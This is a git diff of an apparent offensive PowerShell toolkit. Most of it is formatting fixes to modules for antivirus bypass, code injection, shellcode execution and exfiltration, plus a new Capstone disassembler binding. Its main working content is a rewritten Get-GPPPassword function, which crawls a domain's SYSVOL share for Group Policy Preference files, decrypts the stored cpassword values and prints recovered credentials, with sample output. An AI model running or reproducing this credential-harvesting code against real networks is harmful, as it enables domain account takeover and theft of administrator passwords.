diff options
364 files changed, 1688 insertions, 17271 deletions
@@ -45,7 +45,6 @@ local.properties [Dd]ebug/ [Rr]elease/ -x64/ build/ [Bb]in/ [Oo]bj/ diff --git a/AntivirusBypass/AntivirusBypass.psd1 b/AntivirusBypass/AntivirusBypass.psd1 index ab2918b..29949c1 100644 --- a/AntivirusBypass/AntivirusBypass.psd1 +++ b/AntivirusBypass/AntivirusBypass.psd1 @@ -1,4 +1,4 @@ -@{
+@{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'AntivirusBypass.psm1'
@@ -84,4 +84,4 @@ FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1 # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
-}
\ No newline at end of file +}
diff --git a/AntivirusBypass/AntivirusBypass.psm1 b/AntivirusBypass/AntivirusBypass.psm1 index e5234fb..81d3818 100644 --- a/AntivirusBypass/AntivirusBypass.psm1 +++ b/AntivirusBypass/AntivirusBypass.psm1 @@ -1 +1 @@ -Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file +Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} diff --git a/AntivirusBypass/Find-AVSignature.ps1 b/AntivirusBypass/Find-AVSignature.ps1 index 80e2b1f..d2487b3 100644 --- a/AntivirusBypass/Find-AVSignature.ps1 +++ b/AntivirusBypass/Find-AVSignature.ps1 @@ -183,4 +183,4 @@ http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2 #During testing using large binaries, memory usage was excessive so lets fix that [System.GC]::Collect() Write-Verbose "Completed!" -}
\ No newline at end of file +} diff --git a/Capstone/Capstone.psd1 b/Capstone/Capstone.psd1 new file mode 100644 index 0000000..d85443f --- /dev/null +++ b/Capstone/Capstone.psd1 @@ -0,0 +1,48 @@ +@{ + +# Script module or binary module file associated with this manifest. +ModuleToProcess = 'Capstone.psm1' + +# Version number of this module. +ModuleVersion = '2.0.0.0' + +# ID used to uniquely identify this module +GUID = 'bc335667-02fd-46c4-a3d9-0a5113c9c03b' + +# Author of this module +Author = 'Matthew Graeber' + +# Copyright statement for this module +Copyright = 'see LICENSE.TXT' + +# Description of the functionality provided by this module +Description = 'Capstone Disassembly Framework Binding Module' + +# Minimum version of the Windows PowerShell engine required by this module +PowerShellVersion = '3.0' + +# Minimum version of the common language runtime (CLR) required by this module +CLRVersion = '4.0' + +# Assemblies that must be loaded prior to importing this module +RequiredAssemblies = 'lib/capstone.dll' + +# Format files (.ps1xml) to be loaded when importing this module +FormatsToProcess = 'Get-CSDisassembly.format.ps1xml' + +# Functions to export from this module +FunctionsToExport = '*' + +# List of all modules packaged with this module. +ModuleList = @(@{ModuleName = 'Capstone'; ModuleVersion = '1.0.0.0'; GUID = 'bc335667-02fd-46c4-a3d9-0a5113c9c03b'}) + +# List of all files packaged with this module +FileList = 'Capstone.psm1', + 'Capstone.psd1', + 'Get-CSDisassembly.format.ps1xml', + 'LICENSE.TXT', + 'README', + 'lib/capstone.dll', + 'lib/x86/libcapstone.dll', + 'lib/x64/libcapstone.dll' +} diff --git a/Capstone/Capstone.psm1 b/Capstone/Capstone.psm1 new file mode 100644 index 0000000..6f55c1e --- /dev/null +++ b/Capstone/Capstone.psm1 @@ -0,0 +1,173 @@ +#Requires -Modules Capstone + +function Get-CSDisassembly +{ +<# +.SYNOPSIS + + Disassembles a byte array using the Capstone Engine disassembly framework. + + PowerSploit Function: Get-CSDisassembly + Author: Matthew Graeber (@mattifestation) + License: See LICENSE.TXT + Required Dependencies: lib\capstone.dll, lib\[x86|x64]\libcapstone.dll + Optional Dependencies: None + +.DESCRIPTION + + Get-CSDisassembly is compatible on 32 and 64-bit. + +.PARAMETER Architecture + + Specifies the architecture of the code to be disassembled. + +.PARAMETER Mode + + Specifies the mode in which to disassemble code. For example, to disassemble Amd64 code, architecture is set to 'X86' and Mode is set to 'MODE_64'. + +.PARAMETER Code + + A byte array consisting of the code to be disassembled. + +.PARAMETER Offset + + Specifies the starting address of the disassembly listing. + +.PARAMETER Count + + Specifies the maximum number of instructions to disassemble. + +.PARAMETER Syntax + + Specifies the syntax flavor to be used (INTEL vs. ATT). + +.PARAMETER DetailOn + + Specifies that detailed parsing should be performed - i.e. provide detailed information for each disassembled instruction. + +.PARAMETER Verstion + + Prints the running Capstone Framework version. + +.EXAMPLE + + $Bytes = [Byte[]] @( 0x8D, 0x4C, 0x32, 0x08, 0x01, 0xD8, 0x81, 0xC6, 0x34, 0x12, 0x00, 0x00 ) + Get-CSDisassembly -Architecture X86 -Mode Mode16 -Code $Bytes -Offset 0x1000 + + $Bytes = [Byte[]] @( 0x8D, 0x4C, 0x32, 0x08, 0x01, 0xD8, 0x81, 0xC6, 0x34, 0x12, 0x00, 0x00 ) + Get-CSDisassembly -Architecture X86 -Mode Mode32 -Code $Bytes + + $Bytes = [Byte[]] @( 0x8D, 0x4C, 0x32, 0x08, 0x01, 0xD8, 0x81, 0xC6, 0x34, 0x12, 0x00, 0x00 ) + Get-CSDisassembly -Architecture X86 -Mode Mode32 -Code $Bytes -Syntax ATT + + $Bytes = [Byte[]] @( 0x55, 0x48, 0x8b, 0x05, 0xb8, 0x13, 0x00, 0x00 ) + Get-CSDisassembly -Architecture X86 -Mode Mode64 -Code $Bytes -DetailOn + + $Bytes = [Byte[]] @( 0xED, 0xFF, 0xFF, 0xEB, 0x04, 0xe0, 0x2d, 0xe5, 0x00, 0x00, 0x00, 0x00, 0xe0, 0x83, 0x22, 0xe5, 0xf1, 0x02, 0x03, 0x0e, 0x00, 0x00, 0xa0, 0xe3, 0x02, 0x30, 0xc1, 0xe7, 0x00, 0x00, 0x53, 0xe3 ) + Get-CSDisassembly -Architecture Arm -Mode Arm -Code $Bytes + + $Bytes = [Byte[]] @( 0x4f, 0xf0, 0x00, 0x01, 0xbd, 0xe8, 0x00, 0x88, 0xd1, 0xe8, 0x00, 0xf0 ) + Get-CSDisassembly -Architecture Arm -Mode Thumb -Code $Bytes + + $Bytes = [Byte[]] @( 0x10, 0xf1, 0x10, 0xe7, 0x11, 0xf2, 0x31, 0xe7, 0xdc, 0xa1, 0x2e, 0xf3, 0xe8, 0x4e, 0x62, 0xf3 ) + Get-CSDisassembly -Architecture Arm -Mode Arm -Code $Bytes + + $Bytes = [Byte[]] @( 0x70, 0x47, 0xeb, 0x46, 0x83, 0xb0, 0xc9, 0x68 ) + Get-CSDisassembly -Architecture Arm -Mode Thumb -Code $Bytes -DetailOn + + $Bytes = [Byte[]] @( 0x21, 0x7c, 0x02, 0x9b, 0x21, 0x7c, 0x00, 0x53, 0x00, 0x40, 0x21, 0x4b, 0xe1, 0x0b, 0x40, 0xb9 ) + Get-CSDisassembly -Architecture Arm64 -Mode Arm -Code $Bytes + + $Bytes = [Byte[]] @( 0x0C, 0x10, 0x00, 0x97, 0x00, 0x00, 0x00, 0x00, 0x24, 0x02, 0x00, 0x0c, 0x8f, 0xa2, 0x00, 0x00, 0x34, 0x21, 0x34, 0x56 ) + Get-CSDisassembly -Architecture Mips -Mode 'Mode32, BigEndian' -Code $Bytes + + $Bytes = [Byte[]] @( 0x56, 0x34, 0x21, 0x34, 0xc2, 0x17, 0x01, 0x00 ) + Get-CSDisassembly -Architecture Mips -Mode 'Mode64, LittleEndian' -Code $Bytes + + $Bytes = [Byte[]] @( 0x80, 0x20, 0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x10, 0x43, 0x23, 0x0e, 0xd0, 0x44, 0x00, 0x80, 0x4c, 0x43, 0x22, 0x02, 0x2d, 0x03, 0x00, 0x80, 0x7c, 0x43, 0x20, 0x14, 0x7c, 0x43, 0x20, 0x93, 0x4f, 0x20, 0x00, 0x21, 0x4c, 0xc8, 0x00, 0x21 ) + Get-CSDisassembly -Architecture PPC -Mode BigEndian -Code $Bytes + +.INPUTS + + None + + You cannot pipe objects to Get-CSDisassembly. + +.OUTPUTS + + Capstone.Instruction[] + + Get-CSDisassembly returns an array of Instruction objects. +#> + + [OutputType([Capstone.Instruction])] + [CmdletBinding(DefaultParameterSetName = 'Disassemble')] + Param ( + [Parameter(Mandatory, ParameterSetName = 'Disassemble')] + [Capstone.Architecture] + $Architecture, + + [Parameter(Mandatory, ParameterSetName = 'Disassemble')] + [Capstone.Mode] + $Mode, + + [Parameter(Mandatory, ParameterSetName = 'Disassemble')] + [ValidateNotNullOrEmpty()] + [Byte[]] + $Code, + + [Parameter( ParameterSetName = 'Disassemble' )] + [UInt64] + $Offset = 0, + + [Parameter( ParameterSetName = 'Disassemble' )] + [UInt32] + $Count = 0, + + [Parameter( ParameterSetName = 'Disassemble' )] + [ValidateSet('Intel', 'ATT')] + [String] + $Syntax, + + [Parameter( ParameterSetName = 'Disassemble' )] + [Switch] + $DetailOn, + + [Parameter( ParameterSetName = 'Version' )] + [Switch] + $Version + ) + + if ($PsCmdlet.ParameterSetName -eq 'Version') + { + $Disassembly = New-Object Capstone.Capstone([Capstone.Architecture]::X86, [Capstone.Mode]::Mode16) + $Disassembly.Version + + return + } + + $Disassembly = New-Object Capstone.Capstone($Architecture, $Mode) + + if ($Disassembly.Version -ne [Capstone.Capstone]::BindingVersion) + { + Write-Error "capstone.dll version ($([Capstone.Capstone]::BindingVersion.ToString())) should be the same as libcapstone.dll version. Otherwise, undefined behavior is likely." + } + + if ($Syntax) + { + switch ($Syntax) + { + 'Intel' { $SyntaxMode = [Capstone.OptionValue]::SyntaxIntel } + 'ATT' { $SyntaxMode = [Capstone.OptionValue]::SyntaxATT } + } + + $Disassembly.SetSyntax($SyntaxMode) + } + + if ($DetailOn) + { + $Disassembly.SetDetail($True) + } + + $Disassembly.Disassemble($Code, $Offset, $Count) +}
\ No newline at end of file diff --git a/Capstone/Get-CSDisassembly.format.ps1xml b/Capstone/Get-CSDisassembly.format.ps1xml new file mode 100644 index 0000000..e9703a2 --- /dev/null +++ b/Capstone/Get-CSDisassembly.format.ps1xml @@ -0,0 +1,41 @@ +<?xml version="1.0" encoding="utf-8" ?> +<Configuration> + <ViewDefinitions> + <View> + <Name>InstructionView</Name> + <ViewSelectedBy> + <TypeName>Capstone.Instruction</TypeName> + </ViewSelectedBy> + <TableControl> + <AutoSize/> + <TableHeaders> + <TableColumnHeader> + <Label>Address</Label> + </TableColumnHeader> + <TableColumnHeader> + <Label>Mnemonic</Label> + </TableColumnHeader> + <TableColumnHeader> + <Label>Operands</Label> + </TableColumnHeader> + </TableHeaders> + <TableRowEntries> + <TableRowEntry> + <TableColumnItems> + <TableColumnItem> + <PropertyName>Address</PropertyName> + <FormatString>0x{0:X8}</FormatString> + </TableColumnItem> + <TableColumnItem> + <PropertyName>Mnemonic</PropertyName> + </TableColumnItem> + <TableColumnItem> + <PropertyName>Operands</PropertyName> + </TableColumnItem> + </TableColumnItems> + </TableRowEntry> + </TableRowEntries> + </TableControl> + </View> + </ViewDefinitions> +</Configuration>
\ No newline at end of file diff --git a/Capstone/LICENSE.TXT b/Capstone/LICENSE.TXT new file mode 100644 index 0000000..9edde0b --- /dev/null +++ b/Capstone/LICENSE.TXT @@ -0,0 +1,30 @@ +This is the software license for Capstone disassembly framework. +Capstone has been designed & implemented by Nguyen Anh Quynh <aquynh@gmail.com> +See http://www.capstone-engine.org for further information. + +Copyright (c) 2013, COSEINC. +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +* Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. +* Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. +* Neither the name of the developer(s) nor the names of its + contributors may be used to endorse or promote products derived from this + software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE +LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +POSSIBILITY OF SUCH DAMAGE. diff --git a/Capstone/README b/Capstone/README new file mode 100644 index 0000000..cbab0cb --- /dev/null +++ b/Capstone/README @@ -0,0 +1,17 @@ +This module has three dependencies: +* lib\x86\libcapstone.dll (the 32-bit unmanaged Capstone library) +* lib\x64\libcapstone.dll (the 64-bit unmanaged Capstone library) +* lib\capstone.dll (the managed C# bindings to the Capstone Framework) + +To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. + +The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" +The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" + +To use the module, type `Import-Module Capstone` + +To see the commands imported, type `Get-Command -Module Capstone` + +For help on each individual command, Get-Help is your friend. + +Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
\ No newline at end of file diff --git a/Capstone/lib/capstone.dll b/Capstone/lib/capstone.dll Binary files differnew file mode 100644 index 0000000..809932b --- /dev/null +++ b/Capstone/lib/capstone.dll diff --git a/Capstone/lib/place_capstone.dll_here b/Capstone/lib/place_capstone.dll_here new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/Capstone/lib/place_capstone.dll_here diff --git a/Capstone/lib/x64/libcapstone.dll b/Capstone/lib/x64/libcapstone.dll Binary files differnew file mode 100644 index 0000000..8d0a578 --- /dev/null +++ b/Capstone/lib/x64/libcapstone.dll diff --git a/Capstone/lib/x64/place_64-bit_libcapstone.dll_here b/Capstone/lib/x64/place_64-bit_libcapstone.dll_here new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/Capstone/lib/x64/place_64-bit_libcapstone.dll_here diff --git a/Capstone/lib/x86/libcapstone.dll b/Capstone/lib/x86/libcapstone.dll Binary files differnew file mode 100644 index 0000000..bb919a6 --- /dev/null +++ b/Capstone/lib/x86/libcapstone.dll diff --git a/Capstone/lib/x86/place_32-bit_libcapstone.dll_here b/Capstone/lib/x86/place_32-bit_libcapstone.dll_here new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/Capstone/lib/x86/place_32-bit_libcapstone.dll_here diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1 index 394c7de..07963fc 100644 --- a/CodeExecution/CodeExecution.psd1 +++ b/CodeExecution/CodeExecution.psd1 @@ -1,4 +1,4 @@ -@{ +@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'CodeExecution.psm1' @@ -85,4 +85,4 @@ FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', ' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' -}
\ No newline at end of file +} diff --git a/CodeExecution/CodeExecution.psm1 b/CodeExecution/CodeExecution.psm1 index e5234fb..81d3818 100644 --- a/CodeExecution/CodeExecution.psm1 +++ b/CodeExecution/CodeExecution.psm1 @@ -1 +1 @@ -Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file +Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} diff --git a/CodeExecution/Invoke-DllInjection.ps1 b/CodeExecution/Invoke-DllInjection.ps1 index 572a911..8395ab8 100644 --- a/CodeExecution/Invoke-DllInjection.ps1 +++ b/CodeExecution/Invoke-DllInjection.ps1 @@ -325,4 +325,4 @@ http://www.exploit-monday.com }
Write-Verbose "Injected DLL information:$($DllInfo)"
-}
\ No newline at end of file +}
diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index ccc1dd6..599212b 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -2840,4 +2840,4 @@ Function Main } Main -}
\ No newline at end of file +} diff --git a/CodeExecution/Invoke-ShellcodeMSIL.ps1 b/CodeExecution/Invoke-ShellcodeMSIL.ps1 index 4123d06..158a643 100644 --- a/CodeExecution/Invoke-ShellcodeMSIL.ps1 +++ b/CodeExecution/Invoke-ShellcodeMSIL.ps1 @@ -1,4 +1,4 @@ -function Invoke-ShellcodeMSIL +function Invoke-ShellcodeMSIL { <# .SYNOPSIS @@ -264,4 +264,4 @@ { Write-Verbose 'Shellcode executed successfully!' } -}
\ No newline at end of file +} diff --git a/CodeExecution/Watch-BlueScreen.ps1 b/CodeExecution/Watch-BlueScreen.ps1 index 2fa317e..0a12a91 100644 --- a/CodeExecution/Watch-BlueScreen.ps1 +++ b/CodeExecution/Watch-BlueScreen.ps1 @@ -1,4 +1,4 @@ -function Watch-BlueScreen +function Watch-BlueScreen { <# .SYNOPSIS @@ -15,7 +15,7 @@ .NOTES Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov - tweeted this technique on 5/13/2013. + ?tweeted this technique on 5/13/2013. .LINK @@ -75,4 +75,4 @@ $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null } -}
\ No newline at end of file +} diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1 index 28dbcab..2a5a152 100644 --- a/Exfiltration/Exfiltration.psd1 +++ b/Exfiltration/Exfiltration.psd1 @@ -1,4 +1,4 @@ -@{
+@{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Exfiltration.psm1'
@@ -75,7 +75,8 @@ ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = # List of all files packaged with this module
FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
- 'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1'
+ 'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',
+ 'VolumeShadowCopyTools.ps1'
# Private data to pass to the module specified in RootModule/ModuleToProcess
# PrivateData = ''
@@ -86,4 +87,4 @@ FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
-}
\ No newline at end of file +}
diff --git a/Exfiltration/Exfiltration.psm1 b/Exfiltration/Exfiltration.psm1 index e5234fb..81d3818 100644 --- a/Exfiltration/Exfiltration.psm1 +++ b/Exfiltration/Exfiltration.psm1 @@ -1 +1 @@ -Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file +Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 7dbd23d..ea87de4 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -1,4 +1,4 @@ -function Get-GPPPassword { +function Get-GPPPassword { <# .SYNOPSIS @@ -9,6 +9,7 @@ License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None + Version: 2.4.2 .DESCRIPTION @@ -16,7 +17,43 @@ .EXAMPLE - Get-GPPPassword + PS C:\> Get-GPPPassword + + NewName : [BLANK] + Changed : {2014-02-21 05:28:53} + Passwords : {password12} + UserNames : {test1} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml + + NewName : {mspresenters} + Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} + Passwords : {Recycling*3ftw!, password123, password1234} + UserNames : {Administrator (built-in), DummyAccount, dummy2} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml + + NewName : [BLANK] + Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} + Passwords : {password, password1234$} + UserNames : {administrator, admin} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml + + NewName : [BLANK] + Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} + Passwords : {password, read123} + UserNames : {DEMO\Administrator, admin} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml + +.EXAMPLE + + PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq + + password + password12 + password123 + password1234 + password1234$ + read123 + Recycling*3ftw! .LINK @@ -29,8 +66,12 @@ [CmdletBinding()] Param () + #Some XML issues between versions + Set-StrictMode -Version 2 + #define helper function that decodes and decrypts password function Get-DecryptedCpassword { + [CmdletBinding()] Param ( [string] $Cpassword ) @@ -38,7 +79,12 @@ try { #Append appropriate padding based on string length $Mod = ($Cpassword.length % 4) - if ($Mod -ne 0) {$Cpassword += ('=' * (4 - $Mod))} + + switch ($Mod) { + '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)} + '2' {$Cpassword += ('=' * (4 - $Mod))} + '3' {$Cpassword += ('=' * (4 - $Mod))} + } $Base64Decoded = [Convert]::FromBase64String($Cpassword) @@ -60,78 +106,119 @@ catch {Write-Error $Error[0]} } - #ensure that machine is domain joined and script is running as a domain account - if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) - { - throw 'Machine is not joined to a domain.' - } - - #discover potential files containing passwords ; not complaining in case of denied access to a directory - $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml' + #define helper function to parse fields from xml files + function Get-GPPInnerFields { + [CmdletBinding()] + Param ( + $File + ) - if ( -not $XMlFiles ) - { - throw 'No files containing encrypted passwords found.' - } - - foreach ($File in $XMLFiles) { - try { - $Filename = $File.Name - $Filepath = $File.VersionInfo.FileName - - #put filename in $XmlFile + + $Filename = Split-Path $File -Leaf [xml] $Xml = Get-Content ($File) - #declare blank variables - $Cpassword = '' - $UserName = '' - $NewName = '' - $Changed = '' + #declare empty arrays + $Cpassword = @() + $UserName = @() + $NewName = @() + $Changed = @() + $Password = @() - switch ($Filename) { + #check for password field + if ($Xml.innerxml -like "*cpassword*"){ + + Write-Verbose "Potential password in $File" + + switch ($Filename) { - 'Groups.xml' { - $Cpassword = $Xml.Groups.User.Properties.cpassword - $UserName = $Xml.Groups.User.Properties.userName - $NewName = $Xml.Groups.User.Properties.newName - $Changed = $Xml.Groups.User.changed - } + 'Groups.xml' { + $Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } - 'Services.xml' { - $Cpassword = $Xml.NTServices.NTService.Properties.cpassword - $UserName = $Xml.NTServices.NTService.Properties.accountName - $Changed = $Xml.NTServices.NTService.changed - } + 'Services.xml' { + $Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } - 'Scheduledtasks.xml' { - $Cpassword = $Xml.ScheduledTasks.Task.Properties.cpassword - $UserName = $Xml.ScheduledTasks.Task.Properties.runAs - $Changed = $Xml.ScheduledTasks.Task.changed - } + 'Scheduledtasks.xml' { + $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } - 'DataSources.xml' { - $Cpassword = $Xml.DataSources.DataSource.Properties.cpassword - $UserName = $Xml.DataSources.DataSource.Properties.username - $Changed = $Xml.DataSources.DataSource.changed + 'DataSources.xml' { + $Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } + + 'Printers.xml' { + $Cpassword += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } + + 'Drives.xml' { + $Cpassword += , $Xml | Select-Xml "/Drives/Drive/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } } - } - - if ($Cpassword) {$Password = Get-DecryptedCpassword $Cpassword} - - else {Write-Verbose "No encrypted passwords found in $Filepath"} - + } + + foreach ($Pass in $Cpassword) { + Write-Verbose "Decrypting $Pass" + $DecryptedPassword = Get-DecryptedCpassword $Pass + Write-Verbose "Decrypted a password of $DecryptedPassword" + #append any new passwords to array + $Password += , $DecryptedPassword + } + + #put [BLANK] in variables + if (!($Password)) {$Password = '[BLANK]'} + if (!($UserName)) {$UserName = '[BLANK]'} + if (!($Changed)) {$Changed = '[BLANK]'} + if (!($NewName)) {$NewName = '[BLANK]'} + #Create custom object to output results - $ObjectProperties = @{'Password' = $Password; - 'UserName' = $UserName; + $ObjectProperties = @{'Passwords' = $Password; + 'UserNames' = $UserName; 'Changed' = $Changed; - 'NewName' = $NewName - 'File' = $Filepath} + 'NewName' = $NewName; + 'File' = $File} $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties - Write-Output $ResultsObject + Write-Verbose "The password is between {} and may be more than one value." + if ($ResultsObject) {Return $ResultsObject} + } + + catch {Write-Error $Error[0]} + } + + try { + #ensure that machine is domain joined and script is running as a domain account + if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) { + throw 'Machine is not a domain member or User is not a member of the domain.' + } + + #discover potential files containing passwords ; not complaining in case of denied access to a directory + Write-Verbose 'Searching the DC. This could take a while.' + $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' + + if ( -not $XMlFiles ) {throw 'No preference files found.'} + + Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords." + + foreach ($File in $XMLFiles) { + $Result = (Get-GppInnerFields $File.Fullname) + Write-Output $Result } - - catch {Write-Error $Error[0]} } + + catch {Write-Error $Error[0]} } diff --git a/Exfiltration/Get-Keystrokes.ps1 b/Exfiltration/Get-Keystrokes.ps1 index 48b7df6..75400a1 100644 --- a/Exfiltration/Get-Keystrokes.ps1 +++ b/Exfiltration/Get-Keystrokes.ps1 @@ -1,4 +1,4 @@ -function Get-Keystrokes { +function Get-Keystrokes { <# .SYNOPSIS @@ -246,4 +246,4 @@ } | Out-Null } -}
